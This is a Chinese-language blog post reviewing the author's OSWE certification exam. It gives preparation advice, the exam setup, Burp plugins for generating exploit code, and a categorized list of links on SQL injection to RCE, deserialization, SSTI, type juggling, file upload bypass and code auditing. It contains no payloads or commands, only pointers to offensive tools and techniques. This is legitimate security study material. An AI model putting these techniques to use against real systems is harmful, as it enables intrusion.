喵喵喵
准备
主要准备就是教材和lab,以及lab里额外的那几套练习
pentesrerlab的code review basge
https://pentesterlab.com/badges/codereview
以及BurpSuite官方学院练习全做完
Dashboard | Web Security Academy - PortSwigger
https://portswigger.net/web-security/dashboard
参考资源里那些也都大概看过
考试
就是时间记录里那样
考试给了5台机器,2台考试目标机,两台对应的调试机,一台kali
因为网络问题,GUI远程连接调试机,进行VSCODE远程调试非常卡,所以就没调试,只是ssh连上去分析代码,测试
通读代码,理解完整的逻辑,漏洞点都是是在lab里接触过的(包括额外练习中的),主要是发现它们,把不同的点组合起来,完成整个利用流程
手工利用成功后写exp都可以直接用burp插件帮助,测试exp可以在给的那台kali上跑,通信速度会很快
大概就这些
时间记录
大概就是这样:
1 | 3号 |
burp插件
burp里直接生成对应request代码,方便写exp,主要用python,但某些情况必须用Java来做的话,用copy2java也可以,需要安装一个第三方库
- Copy As Python-Requests - PortSwigger
https://portswigger.net/bappstore/b324647b6efa4b6a8f346389730df160 - TheKingOfDuck/Copy2Java: 一键生成Java代码的burp插件/Generate Java script for fuzzing in Burp。
https://github.com/TheKingOfDuck/Copy2Java - kevinsawicki/http-request: Java HTTP Request Library
https://github.com/kevinsawicki/http-request
参考资源
All learning materials | Web Security Academy
PentesterLab: Learn Web App Pentesting!
HTB 中 OSWE prep
TROUBLE-1/White-box-pentesting: This lab is created to demonstrate pass-the-hash, blind sql and SSTI vulnerabilities
softwaresecured/secure-code-review-checklist: A starter secure code review checklist
https://github.com/softwaresecured/secure-code-review-checklist
Bug Patterns - Find Security Bugs
timip/OSWE: OSWE Preparation
wetw0rk/AWAE-PREP: This repository will serve as the “master” repo containing all trainings and tutorials done in preperation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses.
Home · rinku191/OSWE-prepration Wiki
w181496/Web-CTF-Cheatsheet: Web CTF CheatSheet 🐈
sql注入
PentesterLab: Learn Web App Pentesting!
https://pentesterlab.com/exercises/from_sqli_to_shell_pg_edition/course
Blind SQL Injection | OWASP
POSTGRESQL CODE EXECUTION: UDF REVISITED | by AFINE | Medium
https://afinepl.medium.com/postgresql-code-execution-udf-revisited-3b08412f47c1
SQL Injection Double Uppercut :: How to Achieve Remote Code Execution Against PostgreSQL
SQL Injection and Postgres - An adventure to eventual RCE
Exploiting PostgreSQL Restore - Blog
https://jon-stewart.github.io/exploiting-postgresql-restore/
Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest | by Greenwolf | Greenwolf Security | Medium
Taking SQL Injections further (Blind Second Order SQL Injection + TMHC CTF Shitter Writeup) - Web Hacking - 0x00sec - The Home of the Hacker
Lord of SQLInjection
21y4d/blindSQLi: A python based blind SQL injection exploitation script
SSTI
DiogoMRSilva/websitesVulnerableToSSTI: Simple websites vulnerable to Server Side Template Injections(SSTI)
epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
XSS
XSS Showcase
XSS Challenges (by yamagata21) - Stage #1
Client XSS Exercises - DomGoat
Javascript for Pentesters
反序列化
Deserialization - OWASP Cheat Sheet Series
https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
OWASP TOP 10: Insecure Deserialization - Detectify Blog
https://blog.detectify.com/2018/03/21/owasp-top-10-insecure-deserialization/
OWASP Top 10 in 2017: Insecure Deserialization Security Vulnerability Practical Overview | ImmuniWeb Security Blog
https://www.immuniweb.com/blog/OWASP-insecure-deserialization.html
JAVA
ManageEngine Applications Manager Deserialization Unauthenticated RCE · Application Security Blog
Java Deserialization — From Discovery to Reverse Shell on Limited Environments | by Francesco Soncina (phra) | ABN AMRO — Red Team | Medium
Understanding & practicing java deserialization exploits – DiabloHorn
https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/
Understanding Java deserialization – Nytro Security
https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/
What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.
GrrrDog/Java-Deserialization-Cheat-Sheet: The cheat sheet about Java Deserialization vulnerabilities
.NET
Ivan1ee/NET-Deserialize: 总结了十篇.Net反序列化文章,持续更新
DotNetNuke 任意代码执行漏洞 (CVE-2017-9822) 分析预警
How to exploit the DotNetNuke Cookie Deserialization - Pentest-Tools.com Blog
https://pentest-tools.com/blog/exploit-dotnetnuke-cookie-deserialization/
ObjectDataProvider Class (System.Windows.Data) | Microsoft Docs
Details of XML serialization | Microsoft Docs
https://docs.microsoft.com/en-us/dotnet/standard/serialization/introducing-xml-serialization
New .NET deserialization gadget for compact payload. When size matters | Micro Focus Community
Exploiting Deserialisation in ASP.NET via ViewState | Soroush Dalili (@irsdl) – سروش دلیلی
https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
slides_bh_pdf
https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
The Battle of C# to JSON Serializers in .NET Core 3 - Michael’s Coding Spot
https://michaelscodingspot.com/the-battle-of-c-to-json-serializers-in-net-core-3/
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization
Black Hat USA 2012 - Are You My Type? Breaking .net Sandboxes Through Serialization - YouTube
https://www.youtube.com/watch?v=Xfbu-pQ1tIc&ab_channel=BlackHat
pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
Python
Escalating Deserialization Attacks (Python)
https://frichetten.com/blog/escalating-deserialization-attacks-python/
Nodejs
Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX
命令注入
Artsploit: [demo.paypal.com] Node.js code injection (RCE)
Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX
Nodejs RCE and a simple reverse shell
https://ibreak.software/2016/08/nodejs-rce-and-a-simple-reverse-shell/
TypeJuggling
PHP Type Juggling. PHP has two comparisons loose (==, =!)… | by HacktheBoxWalkthroughs | Medium
https://medium.com/@Q2hpY2tlblB3bnk/php-type-juggling-c34a10630b10
PHP Type Juggling Vulnerabilities | by Vickie Li | The Startup | Medium
https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09
PHP: PHP type comparison tables - Manual
PHP Type Juggling Vulnerabilities, Netsparker - Paul’s Security Weekly #572 - YouTube
https://www.youtube.com/watch?v=ASYuK01H3Po&ab_channel=SecurityWeekly
PHPMagicTricks-TypeJuggling.pdf
https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
Type Juggling Authentication Bypass Vulnerability in CMS Made Simple | Netsparker
https://www.netsparker.com/blog/web-security/type-juggling-authentication-bypass-cms-made-simple/
Type Juggling and PHP Object Injection, and SQLi, Oh My!
https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/
Magic Hashes | NTT Application Security
spaze/hashes: Magic hashes – PHP hash “collisions”
文件上传
45074-file-upload-restrictions-bypass.pdf
https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf
hacking website by shell uploading
http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html
Unrestricted File Upload | OWASP
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
File upload bypass - Hacker’s Grimoire
https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass
各种语言在线运行环境
Online PHP Editor | ブラウザでプログラミング・実行ができる「オンライン実行環境」|
PHP Sandbox, test PHP online, PHP tester
SQL OnLine IDE
regex101: build, test, and debug regex
基于grep的漏洞发现
Don’t Underestimate Grep Based Code Scanning – Little Man In My Head
https://littlemaninmyhead.wordpress.com/2019/08/04/dont-underestimate-grep-based-code-scanning/
dustyfresh/PHP-vulnerability-audit-cheatsheet: This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet
wireghoul/graudit: grep rough audit - source code auditing tool
Bug Patterns - Find Security Bugs
Using Grep + Regex (Regular Expressions) to Search Text in Linux | DigitalOcean
调试相关
调试.NET程序集
.NET Reflector Visual Studio Extension - Visual Studio Marketplace
dnSpy/dnSpy: .NET debugger and assembly editor
Debug .NET Framework source - Visual Studio (Windows) | Microsoft Docs
How to debug your .NET applications and packages without the actual source | Dominique St-Amand
https://www.domstamand.com/debugging-your-dotnet-applications-and-packages-howto/
语言相关checklist
nodejs
Node.js Security Checklist - RisingStack Engineering
aadityapurani/NodeJS-Red-Team-Cheat-Sheet: NodeJS Red-Team Cheat Sheet
https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet
jesusprubio/awesome-nodejs-pentest: Delightful Node.js packages useful for penetration testing, exploiting, reverse engineer, cryptography …
Secure Code Review and Penetration Testing of Node.js and JavaScript Apps | by Mostafa Moradian | The Startup | Medium
https://github.com/carnal0wnage/exploits-1/blob/master/nodejsshell.py
参考资料
- OSWE Review(受験記) - 高林の雑記ブログ
https://kakyouim.hatenablog.com/entry/2021/04/02/162147 - OSWE Review (AWAE Course) - S7acktrac3
https://stacktrac3.co/oswe-review-awae-course/ - [CERT] OSWE Exam Review and Tips (ft. No Developer Background Candidate) | by bigb0ss | InfoSec Write-ups
https://infosecwriteups.com/cert-oswe-exam-review-and-tips-ft-no-developer-background-candidate-1dad7f545155
